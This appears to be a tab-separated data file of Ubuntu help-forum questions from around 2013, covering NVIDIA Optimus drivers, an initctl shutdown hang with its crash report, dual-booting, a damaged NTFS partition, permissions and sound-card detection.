391193	intel hd4000 + nvidia geforce 710m	translated to english using google : i bought a notebook asus f552cl that has the ability to use either the integrated video card or video card intel nvidia geforce 710m with optimus technology . now on ubuntu 12.04 ( the only one that does not give me problems with the network adapter atheros ) , is used only the intel integrated card , but i would always use the nvidia . how do i install the drivers for the nvidia card and make it usable by default ? thanks and sorry for the problem possibly even stupid original question : ho comprato un notebook asus f552cl che ha la possibilită di utilizzare o la scheda video integrata intel o la scheda video nvidia geforce 710m grazie alla tecnologia optimus . ora su ubuntu 12.04 ( l'unico che non mi da problemi con la scheda di rete atheros ) , viene utilizzata solo la scheda intel integrata , mentre io vorrei utilizzare sempre la nvidia . come devo fare ad installare i driver per la scheda nvidia e renderla utilizzabile di default ? grazie e scusate per il problema possibilmente anche stupido
391201	archive manager error message in 13.10	i have several downloads in archive manager , but when i try to load them i get `` error occurred when loading this archive '' . any suggestions or solutions ?
391205	disable ethernet and hard drive access on an ubuntu live cd	i 'm a teacher . at our school , we 're looking into the possibility of using a custom livecd ( or usb rather ) for our students during exams . we want the live cd to come pre-installed with programs such as libreoffice and geogebra , but we want the local harddrive to be disabled ( the students will store their files on the usb-stick ) , and we also want to disable ethernet so that the students ca n't communicate during the exam . is this possible to do ? i 'm trying to find options in the uck to achieve this , but i 'm pretty new to linux so i 'm having quite a hard time .
391206	initctl does not terminate at computer shutdown	i have a fresh install of 13.10 on an asus zenbook ux31e . every shutdown there is a hang , and with the help of this answer i think i have identified the cause to be /sbin/initctl which does not terminate at shutdown ( it is killed after several seconds delay ) . how can i configure initctl to exit cleanly when it is asked ? attached is the auto-generated file in /var/crash/_sbin_initctl.0.crash problemtype : bug date : sun dec 15 17:16:40 2013 executablepath : /sbin/initctl executabletimestamp : 1381333523 initctllist : avahi-cups-reload stop/waiting avahi-daemon start/running , process 710 mountall-net stop/waiting mountnfs-bootclean.sh start/running passwd stop/waiting rc start/running , process 5044 rsyslog stop/waiting startpar-bridge stop/waiting tty4 stop/waiting udev stop/waiting upstart-udev-bridge stop/waiting ureadahead-other stop/waiting whoopsie stop/waiting winbind stop/waiting apport stop/waiting console-setup stop/waiting hwclock-save stop/waiting irqbalance stop/waiting plymouth-log stop/waiting systemd-logind start/running , process 611 tty5 stop/waiting failsafe stop/waiting hybrid-gfx stop/waiting modemmanager stop/waiting mountall.sh start/running rfkill-store stop/waiting atd stop/waiting dbus start/running , process 570 failsafe-x stop/waiting mounted-var stop/waiting plymouth start/running , process 5165 resolvconf stop/waiting udev-fallback-graphics stop/waiting checkroot.sh start/running control-alt-delete stop/waiting hwclock stop/waiting mounted-proc stop/waiting network-manager stop/waiting alsa-store stop/waiting cups-browsed stop/waiting setvtrgb stop/waiting shutdown stop/waiting alsa-restore stop/waiting cron stop/waiting gdm stop/waiting lightdm stop/waiting mountall stop/waiting mounted-debugfs stop/waiting mountkernfs.sh start/running binfmt-support stop/waiting console stop/waiting mounted-run stop/waiting acpid stop/waiting bluetooth start/running , process 599 checkfs.sh start/running checkroot-bootclean.sh start/running kmod stop/waiting mountnfs.sh start/running plymouth-stop stop/waiting rcs stop/waiting ufw start/running wait-for-state stop/waiting bootmisc.sh start/running flush-early-job-log stop/waiting friendly-recovery stop/waiting rc-sysinit stop/waiting cups stop/waiting pulseaudio stop/waiting upstart-socket-bridge stop/waiting anacron stop/waiting mountdevsubfs.sh start/running tty2 stop/waiting udevtrigger stop/waiting upstart-file-bridge stop/waiting container-detect stop/waiting mounted-dev stop/waiting mtab.sh start/running tty3 stop/waiting udev-finish stop/waiting alsa-state stop/waiting hostname stop/waiting mountall-reboot stop/waiting mountall-shell stop/waiting mounted-tmp stop/waiting network-interface ( lo ) start/running network-interface ( wlan0 ) start/running plymouth-ready ( started ) start/running , process 5182 plymouth-splash stop/waiting plymouth-upstart-bridge stop/waiting tty1 stop/waiting udevmonitor stop/waiting dmesg stop/waiting mountall-bootclean.sh start/running network-interface-security ( network-interface/wlan0 ) start/running network-interface-security ( network-interface/lo ) start/running network-interface-security ( networking ) start/running networking start/running procps stop/waiting rfkill-restore stop/waiting tty6 stop/waiting console-font stop/waiting network-interface-container stop/waiting ureadahead stop/waiting omitpids : 1360 1112 710 5044 5047 611 570 869 1079 599 710 5044 611 570 5165 599 5182 proccmdline : initctl emit plymouth-ready proccwd : / procenviron : term=linux path= ( custom , no user ) procmaps : 7fe15af99000-7fe15afb0000 r-xp 00000000 08:02 1839046 /lib/x86_64-linux-gnu/libpthread-2.17.so 7fe15afb0000-7fe15b1b0000 -- -p 00017000 08:02 1839046 /lib/x86_64-linux-gnu/libpthread-2.17.so 7fe15b1b0000-7fe15b1b1000 r -- p 00017000 08:02 1839046 /lib/x86_64-linux-gnu/libpthread-2.17.so 7fe15b1b1000-7fe15b1b2000 rw-p 00018000 08:02 1839046 /lib/x86_64-linux-gnu/libpthread-2.17.so 7fe15b1b2000-7fe15b1b6000 rw-p 00000000 00:00 0 7fe15b1b6000-7fe15b1bd000 r-xp 00000000 08:02 1839054 /lib/x86_64-linux-gnu/librt-2.17.so 7fe15b1bd000-7fe15b3bc000 -- -p 00007000 08:02 1839054 /lib/x86_64-linux-gnu/librt-2.17.so 7fe15b3bc000-7fe15b3bd000 r -- p 00006000 08:02 1839054 /lib/x86_64-linux-gnu/librt-2.17.so 7fe15b3bd000-7fe15b3be000 rw-p 00007000 08:02 1839054 /lib/x86_64-linux-gnu/librt-2.17.so 7fe15b3be000-7fe15b57b000 r-xp 00000000 08:02 1838931 /lib/x86_64-linux-gnu/libc-2.17.so 7fe15b57b000-7fe15b77b000 -- -p 001bd000 08:02 1838931 /lib/x86_64-linux-gnu/libc-2.17.so 7fe15b77b000-7fe15b77f000 r -- p 001bd000 08:02 1838931 /lib/x86_64-linux-gnu/libc-2.17.so 7fe15b77f000-7fe15b781000 rw-p 001c1000 08:02 1838931 /lib/x86_64-linux-gnu/libc-2.17.so 7fe15b781000-7fe15b786000 rw-p 00000000 00:00 0 7fe15b786000-7fe15b7ca000 r-xp 00000000 08:02 1838943 /lib/x86_64-linux-gnu/libdbus-1.so.3.7.4 7fe15b7ca000-7fe15b9c9000 -- -p 00044000 08:02 1838943 /lib/x86_64-linux-gnu/libdbus-1.so.3.7.4 7fe15b9c9000-7fe15b9ca000 r -- p 00043000 08:02 1838943 /lib/x86_64-linux-gnu/libdbus-1.so.3.7.4 7fe15b9ca000-7fe15b9cb000 rw-p 00044000 08:02 1838943 /lib/x86_64-linux-gnu/libdbus-1.so.3.7.4 7fe15b9cb000-7fe15b9d3000 r-xp 00000000 08:02 1838994 /lib/x86_64-linux-gnu/libnih-dbus.so.1.0.0 7fe15b9d3000-7fe15bbd3000 -- -p 00008000 08:02 1838994 /lib/x86_64-linux-gnu/libnih-dbus.so.1.0.0 7fe15bbd3000-7fe15bbd4000 r -- p 00008000 08:02 1838994 /lib/x86_64-linux-gnu/libnih-dbus.so.1.0.0 7fe15bbd4000-7fe15bbd5000 rw-p 00009000 08:02 1838994 /lib/x86_64-linux-gnu/libnih-dbus.so.1.0.0 7fe15bbd5000-7fe15bbeb000 r-xp 00000000 08:02 1838996 /lib/x86_64-linux-gnu/libnih.so.1.0.0 7fe15bbeb000-7fe15bdeb000 -- -p 00016000 08:02 1838996 /lib/x86_64-linux-gnu/libnih.so.1.0.0 7fe15bdeb000-7fe15bdec000 r -- p 00016000 08:02 1838996 /lib/x86_64-linux-gnu/libnih.so.1.0.0 7fe15bdec000-7fe15bded000 rw-p 00017000 08:02 1838996 /lib/x86_64-linux-gnu/libnih.so.1.0.0 7fe15bded000-7fe15be10000 r-xp 00000000 08:02 1838907 /lib/x86_64-linux-gnu/ld-2.17.so 7fe15bfe9000-7fe15bfee000 rw-p 00000000 00:00 0 7fe15c00d000-7fe15c00f000 rw-p 00000000 00:00 0 7fe15c00f000-7fe15c010000 r -- p 00022000 08:02 1838907 /lib/x86_64-linux-gnu/ld-2.17.so 7fe15c010000-7fe15c012000 rw-p 00023000 08:02 1838907 /lib/x86_64-linux-gnu/ld-2.17.so 7fe15c012000-7fe15c03e000 r-xp 00000000 08:02 3014717 /sbin/initctl 7fe15c23d000-7fe15c23f000 r -- p 0002b000 08:02 3014717 /sbin/initctl 7fe15c23f000-7fe15c240000 rw-p 0002d000 08:02 3014717 /sbin/initctl 7fe15c68d000-7fe15c6ae000 rw-p 00000000 00:00 0 [ heap ] 7fffddbf4000-7fffddc15000 rw-p 00000000 00:00 0 [ stack ] 7fffddcad000-7fffddcaf000 r-xp 00000000 00:00 0 [ vdso ] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [ vsyscall ] procstatus : name : initctl state : s ( sleeping ) tgid : 5185 pid : 5185 ppid : 5182 tracerpid : 0 uid : 0 0 0 0 gid : 0 0 0 0 fdsize : 64 groups : 0 vmpeak : 15316 kb vmsize : 15316 kb vmlck : 0 kb vmpin : 0 kb vmhwm : 1060 kb vmrss : 1060 kb vmdata : 204 kb vmstk : 136 kb vmexe : 176 kb vmlib : 2432 kb vmpte : 52 kb vmswap : 0 kb threads : 1 sigq : 0/30476 sigpnd : 0000000000000000 shdpnd : 0000000000000000 sigblk : 0000000000000000 sigign : 0000000000000000 sigcgt : 0000000180000000 capinh : 0000000000000000 capprm : 0000001fffffffff capeff : 0000001fffffffff capbnd : 0000001fffffffff seccomp : 0 cpus_allowed : ffff cpus_allowed_list : 0-15 mems_allowed : 00000000,00000001 mems_allowed_list : 0 voluntary_ctxt_switches : 55 nonvoluntary_ctxt_switches : 1 processes : user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.0 27300 3084 ? ss 15:34 0:01 /sbin/init root 2 0.0 0.0 0 0 ? s 15:34 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s 15:34 0:00 [ ksoftirqd/0 ] root 5 0.0 0.0 0 0 ? s < 15:34 0:00 [ kworker/0:0h ] root 7 0.0 0.0 0 0 ? s 15:34 0:00 [ migration/0 ] root 8 0.0 0.0 0 0 ? s 15:34 0:00 [ rcu_bh ] root 9 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/0 ] root 10 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/1 ] root 11 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/2 ] root 12 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/3 ] root 13 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/4 ] root 14 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/5 ] root 15 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/6 ] root 16 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/7 ] root 17 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/8 ] root 18 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/9 ] root 19 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/10 ] root 20 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/11 ] root 21 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/12 ] root 22 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/13 ] root 23 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/14 ] root 24 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuob/15 ] root 25 0.0 0.0 0 0 ? s 15:34 0:03 [ rcu_sched ] root 26 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/0 ] root 27 0.0 0.0 0 0 ? s 15:34 0:01 [ rcuos/1 ] root 28 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/2 ] root 29 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/3 ] root 30 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/4 ] root 31 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/5 ] root 32 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/6 ] root 33 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/7 ] root 34 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/8 ] root 35 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/9 ] root 36 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/10 ] root 37 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/11 ] root 38 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/12 ] root 39 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/13 ] root 40 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/14 ] root 41 0.0 0.0 0 0 ? s 15:34 0:00 [ rcuos/15 ] root 42 0.0 0.0 0 0 ? s 15:34 0:00 [ watchdog/0 ] root 43 0.0 0.0 0 0 ? s 15:34 0:00 [ watchdog/1 ] root 44 0.0 0.0 0 0 ? s 15:34 0:00 [ migration/1 ] root 45 0.0 0.0 0 0 ? s 15:34 0:00 [ ksoftirqd/1 ] root 47 0.0 0.0 0 0 ? s < 15:34 0:00 [ kworker/1:0h ] root 48 0.0 0.0 0 0 ? s 15:34 0:00 [ watchdog/2 ] root 49 0.0 0.0 0 0 ? s 15:34 0:00 [ migration/2 ] root 50 0.0 0.0 0 0 ? s 15:34 0:00 [ ksoftirqd/2 ] root 52 0.0 0.0 0 0 ? s < 15:34 0:00 [ kworker/2:0h ] root 53 0.0 0.0 0 0 ? s 15:34 0:00 [ watchdog/3 ] root 54 0.0 0.0 0 0 ? s 15:34 0:00 [ migration/3 ] root 55 0.0 0.0 0 0 ? s 15:34 0:00 [ ksoftirqd/3 ] root 56 0.0 0.0 0 0 ? s 15:34 0:00 [ kworker/3:0 ] root 57 0.0 0.0 0 0 ? s < 15:34 0:00 [ kworker/3:0h ] root 58 0.0 0.0 0 0 ? s < 15:34 0:00 [ khelper ] root 59 0.0 0.0 0 0 ? s 15:34 0:00 [ kdevtmpfs ] root 60 0.0 0.0 0 0 ? s < 15:34 0:00 [ netns ] root 61 0.0 0.0 0 0 ? s < 15:34 0:00 [ writeback ] root 62 0.0 0.0 0 0 ? s < 15:34 0:00 [ kintegrityd ] root 63 0.0 0.0 0 0 ? s < 15:34 0:00 [ bioset ] root 64 0.0 0.0 0 0 ? s < 15:34 0:04 [ kworker/u33:0 ] root 65 0.0 0.0 0 0 ? s < 15:34 0:00 [ kblockd ] root 66 0.0 0.0 0 0 ? s < 15:34 0:00 [ ata_sff ] root 67 0.0 0.0 0 0 ? s 15:34 0:00 [ khubd ] root 68 0.0 0.0 0 0 ? s < 15:34 0:00 [ md ] root 69 0.0 0.0 0 0 ? s < 15:34 0:00 [ devfreq_wq ] root 70 0.0 0.0 0 0 ? s 15:34 0:01 [ kworker/1:1 ] root 72 0.0 0.0 0 0 ? s 15:34 0:00 [ khungtaskd ] root 73 0.0 0.0 0 0 ? s 15:34 0:00 [ kswapd0 ] root 74 0.0 0.0 0 0 ? sn 15:34 0:00 [ ksmd ] root 75 0.0 0.0 0 0 ? sn 15:34 0:00 [ khugepaged ] root 76 0.0 0.0 0 0 ? s 15:34 0:00 [ fsnotify_mark ] root 77 0.0 0.0 0 0 ? s 15:34 0:00 [ ecryptfs-kthrea ] root 78 0.0 0.0 0 0 ? s < 15:34 0:00 [ crypto ] root 90 0.0 0.0 0 0 ? s < 15:34 0:00 [ kthrotld ] root 93 0.0 0.0 0 0 ? s 15:34 0:02 [ kworker/3:1 ] root 115 0.0 0.0 0 0 ? s < 15:34 0:00 [ deferwq ] root 116 0.0 0.0 0 0 ? s < 15:34 0:00 [ charger_manager ] root 117 0.0 0.0 0 0 ? s 15:34 0:00 [ kworker/2:1 ] root 168 0.0 0.0 0 0 ? s 15:34 0:00 [ scsi_eh_0 ] root 169 0.0 0.0 0 0 ? s 15:34 0:00 [ scsi_eh_1 ] root 170 0.0 0.0 0 0 ? s 15:34 0:00 [ scsi_eh_2 ] root 171 0.0 0.0 0 0 ? s 15:34 0:00 [ scsi_eh_3 ] root 172 0.0 0.0 0 0 ? s 15:34 0:00 [ scsi_eh_4 ] root 173 0.0 0.0 0 0 ? s 15:34 0:00 [ scsi_eh_5 ] root 179 0.0 0.0 0 0 ? s 15:34 0:04 [ kworker/u32:7 ] root 189 0.0 0.0 0 0 ? s 15:34 0:00 [ jbd2/sda2-8 ] root 190 0.0 0.0 0 0 ? s < 15:34 0:00 [ ext4-rsv-conver ] root 191 0.0 0.0 0 0 ? s < 15:34 0:00 [ ext4-unrsv-conv ] root 379 0.0 0.0 0 0 ? s < 15:34 0:00 [ cfg80211 ] root 380 0.0 0.0 0 0 ? s 15:34 0:00 [ irq/51-mei_me ] root 416 0.0 0.0 0 0 ? s 15:35 0:00 [ scsi_eh_6 ] root 421 0.0 0.0 0 0 ? s 15:35 0:00 [ rts5139-control ] root 422 0.2 0.0 0 0 ? s 15:35 0:13 [ rts5139-polling ] root 426 0.0 0.0 0 0 ? s < 15:35 0:00 [ kpsmoused ] root 463 0.0 0.0 0 0 ? s < 15:35 0:00 [ led_workqueue ] root 478 0.0 0.0 0 0 ? s < 15:35 0:00 [ hci0 ] root 479 0.0 0.0 0 0 ? s < 15:35 0:00 [ hci0 ] root 507 0.0 0.0 0 0 ? s < 15:35 0:00 [ kvm-irqfd-clean ] root 540 0.0 0.0 0 0 ? s < 15:35 0:00 [ hd-audio0 ] 102 570 0.0 0.0 31528 2448 ? ss 15:35 0:02 dbus-daemon -- system -- fork root 599 0.0 0.0 19388 2120 ? ss 15:35 0:00 /usr/sbin/bluetoothd root 611 0.0 0.0 37152 1784 ? ss 15:35 0:00 /lib/systemd/systemd-logind root 623 0.0 0.0 0 0 ? s < 15:35 0:00 [ krfcommd ] avahi 710 0.0 0.0 32352 1808 ? s 15:35 0:00 avahi-daemon : running [ wim-zenbook.local ] avahi 713 0.0 0.0 0 0 ? z 15:35 0:00 [ avahi-daemon ] < defunct > root 813 0.0 0.0 0 0 ? s 15:35 0:02 [ kworker/2:2 ] root 1112 0.0 0.0 32444 2556 ? ss 15:35 0:00 /sbin/wpa_supplicant -b -p /run/sendsigs.omit.d/wpasupplicant.pid -u -s -o /var/run/wpa_supplicant root 1136 0.0 0.0 0 0 ? s 15:35 0:00 [ kauditd ] root 1732 0.0 0.0 0 0 ? s 15:59 0:02 [ kworker/u32:0 ] root 4609 0.0 0.0 0 0 ? s 16:29 0:02 [ kworker/1:2 ] root 4690 0.0 0.0 0 0 ? s 16:36 0:02 [ kworker/0:0 ] root 4749 0.0 0.0 0 0 ? s 16:51 0:00 [ kworker/0:2 ] root 4820 0.2 0.0 0 0 ? s < 16:59 0:02 [ kworker/u33:2 ] root 4968 0.0 0.0 0 0 ? s 17:10 0:00 [ kworker/u32:1 ] root 5044 0.0 0.0 4440 796 ? ss 17:16 0:00 /bin/sh /etc/init.d/rc 0 root 5108 0.0 0.0 4440 784 ? s 17:16 0:00 /bin/sh /etc/rc0.d/s20sendsigs stop root 5135 0.0 0.0 0 0 ? s 17:16 0:00 [ kworker/3:2 ] root 5141 0.0 0.0 0 0 ? s 17:16 0:00 [ kworker/3:3 ] root 5142 0.0 0.0 0 0 ? s 17:16 0:00 [ kworker/3:4 ] root 5165 1.0 0.4 121780 18460 ? s 17:16 0:00 @ sbin/plymouthd -- mode=shutdown root 5182 0.0 0.0 4440 620 ? ss 17:16 0:00 /bin/sh -e /proc/self/fd/9 root 5185 0.0 0.0 15316 1060 ? s 17:16 0:00 initctl emit plymouth-ready root 5246 0.0 0.3 64680 14844 ? s 17:16 0:00 /usr/bin/python3 /usr/share/apport/unkillable_shutdown -o 1360 -o 1112 -o 710 -o 5044 -o 5047 -o 611 -o 570 -o 869 -o 1079 -o 599 -o 710 -o 5044 -o 611 -o 570 -o 5165 -o 599 -o 5182 root 5247 0.0 0.0 15568 1168 ? r 17:16 0:00 ps aux tags : shutdown-hang title : initctl does not terminate at computer shutdown
391207	regarding configuration of nvidia geforce gt 740m graphics driver for toshiba satellite p50-ax3110 in ubuntu 13.10	i have a toshiba satellite p50-ax3110 laptop which comes with preinstalled windows 8 operating system having the following configuration : 4gb ram , 3rd generation intel core i5 processor , 2gb nvidia geforce gt 740m with optimus graphics card . i have recently installed ubuntu 13.10 alongside windows 8 in my laptop . everything is working fine in ubuntu 13.10 except the 2gb nvidia geforce gt 740m with optimus graphics card . in the device information in ubuntu 13.10 , when i select graphics it shows intel ivy bridge , whereas it should show the nvidia graphics card . i have tried searching for a solution on many websites on the internet , but nothing worked . please provide me the steps on how to configure 2gb nvidia geforce gt 740m with optimus graphics card in ubuntu 13.10 or suggest me any other version of ubuntu which would support 2gb nvidia geforce gt 740m with optimus graphics card . one of the solutions i have tried ( after searching on the internet ) is that i had installed nvidia-331 package along with the bumblebee package from the synaptic package manager , but still the problem persists . kindly provide me with a solution to the above .
391210	install ubuntu 13.04 along side windows 8	i recently bought a ausus n550 notebook with windows 8 preinstalled . now i wanted to install ubuntu 13.04 lts along side window8 , but not able to do it . i found lots post that say to disable secure boot . i went inside my bios setting and saw secure boot option [ enabled ] . do i need to disable it ? i have attached my disk partition info in here so that you guys can see how my hd are partitioned in which format . i have also read in some post that we should not make more than 4 partitions in a hardisk . so i made three primary partition and left one ( 537.80 gb ) unallocated . problems : inserting a ubuntu bootable disk does n't boot on restart . went inside bios but there is no cd drive so that i can keep it as my first boot priority . please help me in installing ubuntu alongside windows 8 . thanks
391211	need help with setup of two connected pcs	i 'm planning the following : i 've got two computers . let 's call them pc_a and pc_b i 'm going to set up both with a kubuntu saucy system pc_a and pc_b should have a wired connection to each other - > crossover cable what will be the address of pc_b at pc_a and vice versa ? - > avahi : name.local this connection should not need a router if possible , only pc_a < -network cable- > pc_b - > crossover cable/avahi pc_a should be able to start a remote session on pc_b > it 'd be better to remote control the running session ( desktop sharing ) while someone is remote-controlling pc_b , pc_b should n't be accessible locally . > redirect display output to virtual display pointing to /dev/null ? other way ? > how to disable all hid 's ? could you please help me with this ? or tell me if it is n't possible . i 'd like to know which software i need and how to configure all the stuff . thanks in advance ps : internet connection is only possible during setup at my home . afterwards they 're offline forever .
391213	used gparted to shrink a windows partition , can i restore it ?	firstly , now i really understand how stupid it is to shrink a ntfs windows 7 partition with gparted when the windows partition manager wont let me shrink as much as i want but ... too late ! so , i have ubuntu 13.04 and windows 7 on my old laptop . a 120 gb disk , which was partitioned in two disk of 60gb , later i decided to install ubuntu and shrinked the second windows partition by 15 ( not really sure ) gb for the ubuntu . everything worked well for a year but it was obvious that i would need more space for the ubuntu . yesterday , i was ready for the process , to shrink my half-empty windows partition ( the one that shrinked the first time , not the boot one ) and started the windows partition manager , but it allowed me to shrink only 13gb when the free was 30 gb . so i said `` damn it , gparted will do the work '' and shrinked 23-4 gb with it ... big mistake . the partition got broken . here is what gparted shows and the error is this . chkdsk in windows ca n't check the disk and wants me to format it . all the linux ntfs tools that i tried show the exact same error ( ntfsfix /dev/sda5 , ntfs-3g -o force , rw /dev/sda5 /media/windows ) . here it the output for `` fdisk -lu '' disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa8d32665 device boot start end blocks id system /dev/sda1 * 63 117210239 58605088+ 7 hpfs/ntfs/exfat /dev/sda2 117210301 234246143 58517921+ f w95 ext 'd ( lba ) /dev/sda5 117210303 155189247 18989472+ 7 hpfs/ntfs/exfat /dev/sda6 204316672 231659519 13671424 83 linux /dev/sda7 231661568 234246143 1292288 82 linux swap / solaris and from the `` parted /dev/sda unit s print '' model : ata st9120822as ( scsi ) disk /dev/sda : 234441648s sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 63s 117210239s 117210177s primary ntfs boot 2 117210301s 234246143s 117035843s extended lba 5 117210303s 155189247s 37978945s logical ntfs 6 204316672s 231659519s 27342848s logical ext4 7 231661568s 234246143s 2584576s logical linux-swap ( v1 ) i would be very thankful if there is a way to recover the data from the partition ( its not really important but would be happy to save it ) , and more important to explain me what to do from now so i can have what i want , working : primary windows partition ( obiously ) , smaller second windows partition , larger linux partition . thank you in advance , i 'm here to provide any information needed : )
391215	dual-boot ubuntu ans windows 8.1	hello there people of the linux community ! i want to try linux out on my toshiba satellite laptop computer . i have the .iso file ready and a usb thumb drive my specs : windows 8.1 intel core i3 500gb hdd intel hd graphics 3000 my pc did not come with windows 8 pre-installed ; it had windows 7 which i update to windows 8 and then updated to windows 8.1 how can i install ubuntu ? ( i have n't touched the partitions or anything ) can i use wubi ?
391216	resolved - access denied . trying to install wordpress theme file	i am in the process setting up wordpress locally ( not on the server ) on my inspirion 3520 that runs 13.10 . i need to install a theme and a plugin that was purchased . i am unable to copy and paste or move the file to /var/wordpress/wp-content/themes . i get `` access denied '' and that i am not the owner ... . how can i access or get privileges access and add the files i need to add ? thank you in advance .
391217	why does the command prompt not work	i just bought the advertised asus laptop with ubuntu 12.04 , and i also just downloaded the 12.04 listed on the download page ; both work for the most part , but the command prompt does not work at all for either . when i enter a command , the command prompt fades , but nothing else happens , regardless of what command i enter . does anyone know what i can/should do about this ? also , this is about the command prompt in the dash , not the terminal .
391224	sudden flash malfunctions	i have begun having some odd problems playing netflix , amazon vod , hulu , youtube and other flash videos . the videos play slightly faster than they should ( seems to be 50 % faster ) and they have no sound . this happens in chrome and netflix-desktop ( using a specialized wine and firefox combo ) , http : //www.compholio.com/netflix-desktop/ however , video works perfectly fine under firefox ( except for netflix-desktop , since it is a program installed on the computer under wine ) . any help will be appreciated .
391227	how can i open a magnet link in ubuntu ?	i have qbittorrent installed . when i click on a magnet link with firefox it prompts me what program to use to open it . i would love to use qbittorrent , but it is not listed there . i search for it and it is not there . i have qbittorrent installed and open , currently running . this is frustrating as hell . why is n't it there ? why ca n't i just open the file that i would of had downloaded an hour ago if i were on windows ? why is such a simple thing so complicated in ubuntu ?
391228	why ca n't i rename a file from 'name ' to 'name ' ?	i am unable to rename a file from release to release which is currently located on my usb flash drive . if i try to rename it through the file manager ( nautilus ) , it shows the error message as follows : also if i try to rename the same file in the terminal , i get this error message : avinash @ avinash-lenovo-ideapad-z500 : /media/avinash/89e8-9e47/dists/quantal $ mv release release mv : ‘release’ and ‘release’ are the same file avinash @ avinash-lenovo-ideapad-z500 : /media/avinash/89e8-9e47/dists/quantal $ however , i appear to be able to rename the file to any other name like release to othername .
391229	focusrite scarlett 8i6 driver	i cant hear anything on ubuntu 13.10 . i cant see my anything on sound settings . i wrote terminal to aplay -l list of playback hardware devices card 0 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : usb [ scarlett 8i6 usb ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 what should i do ?
391230	how to remove nautilus without screwing up unity ?	i recently installed cinnamon on my ubuntu 12.04.1 and i loved the interface of its file manager nemo , which i guess is also based on nautilus . but i prefer nemo over nautilus and i want to remove nautilus completely and have nemo as my defaut file manager . the problem however is that removing nautilus requires me to remove ubuntu-desktop too . is it possible somehow to retain ubuntu desktop and remove nautilus ?
391234	ubuntu 12.04 via xrdp keyboard layout can not change	i have a virtually hosted ubuntu server 12.04 on which i installed unity desktop . it all works fine except the only keyboard option i have is `` us '' . this could be due to the fact that ubuntu server was installed with us keyboard ( by the virtual machine provider ) . i want the keyboard layout to be canadian-french . i can not change the keyboard layout from the gui/desktop see pic . i have the feeling i need to install new layouts , perhaps using apt-get something ! ( noob ) so the questions could be how to add new layouts ? ( i have root btw )
391235	mounting ext4 partition freezes system	i 'm new to linux . i 'm using 13.10 with cinnamon 2.0 on a fujitsu a-series with a toshiba hdd . the disk has four partitions . i was copying a few large files from a windows phone to a partition when nemo ( and everything else ) froze . i shut down , removed the phone and booted . now if i attempt to mount the partition the system freezes up . this is what syslog shows : 20:42:39 aptdaemon : info : quitting due to inactivity 20:42:39 aptdaemon : info : quitting was requested 20:42:51 networkmanager [ 772 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted 20:44:51 networkmanager [ 772 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted 20:45:45 kernel : [ 631.248994 ] ext4-fs ( sda4 ) : recovery complete 20:45:45 kernel : [ 631.280801 ] ext4-fs ( sda4 ) : mounted filesystem with ordered data mode . opts : ( null ) 20:45:45 udisksd [ 1847 ] : mounted /dev/sda4 at /media/trachys/video on behalf of uid 1000 gparted says that there is plenty of unused space on sda4 . any advice or links appreciated . edit : umount tells me : trachys @ trachys-lifebook-ah530-hd6 : /mnt $ sudo umount -a umount : /run/user : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umount : /run/shm : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umount : /run : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umount : /dev : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) umount : / : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) )
